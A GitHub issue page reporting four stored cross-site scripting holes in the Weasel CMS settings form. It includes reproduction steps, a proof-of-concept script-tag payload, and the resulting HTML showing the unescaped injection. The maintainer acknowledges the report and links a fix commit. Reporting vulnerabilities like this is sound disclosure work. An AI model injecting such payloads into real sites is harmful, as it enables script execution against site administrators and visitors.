Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
There are 4 XSS vulnerabilities loading index.php sign in and select "SETTINGS", Insert the payload "'"()/ ><ScRiPt >alert(0)</ScRiPt>//" in the Site Language/Site Title/Site Description/Site Keywords and submit.
open index.php line 376
<section class="column-one-third sidebar"> -- | <h2><i class="fa fa-cog fa-fw"></i> Settings</h2> | <form method="POST" action="/cms/weasel/index.php"> | | <p> | <label for="site-language"> | <span><i class="fa fa-globe fa-fw"></i> Site Language <small>( 2 letter i.e: ES, EN )</small></span> | <input type="text" name="site-language" id="site-language" value="'"()/ ><ScRiPt >alert(0)</ScRiPt>//" /> | </label> | </p> | <p> | <label for="site-title"> | <span><i class="fa fa-font fa-fw"></i> Site Title</span> | <input type="text" name="site-title" id="site-title" value="Weasel CMS" /> | </label> | </p> | <p> | <label for="site-description"> | <span><i class="fa fa-align-left fa-fw"></i> Site Description</span> | <input type="text" name="site-description" id="site-description" value="Open Source, very simple and lightweight flat file Content Management System written in PHP and built specifically for small websites." /> | </label> | </p> | <p> | <label for="site-keywords"> | <span><i class="fa fa-tags fa-fw"></i> Site Keywords <small>( Comma separated values )</small></span> | <input type="text" name="site-keywords" id="site-keywords" value="Weasel, WeaselCMS, PHP, CMS, Simple, lightweight, small, easy, Minimal" /> | </label> | </p> | <p> | <label for="site-theme"> | <span><i class="fa fa-paint-brush fa-fw"></i> Theme</span> | <select name="site-theme" id="site-theme"> | <option value="weasel">weasel</option><option value="weasel-dark" selected=selected>weasel-dark</option> </select> | </label> | </p> | <p> | <input type="submit" name="settings-submit" id="settings-submit" class="button-main" value="Save Settings" /> | </p> | </form> | </section>
The text was updated successfully, but these errors were encountered:
d13ff92
Thanks for reporting this @SkyZhang47
Sorry, something went wrong.
No branches or pull requests
There are 4 XSS vulnerabilities
loading index.php
sign in and select "SETTINGS",
Insert the payload "'"()/ ><ScRiPt >alert(0)</ScRiPt>//" in the Site Language/Site Title/Site Description/Site Keywords and submit.
open index.php
line 376
The text was updated successfully, but these errors were encountered: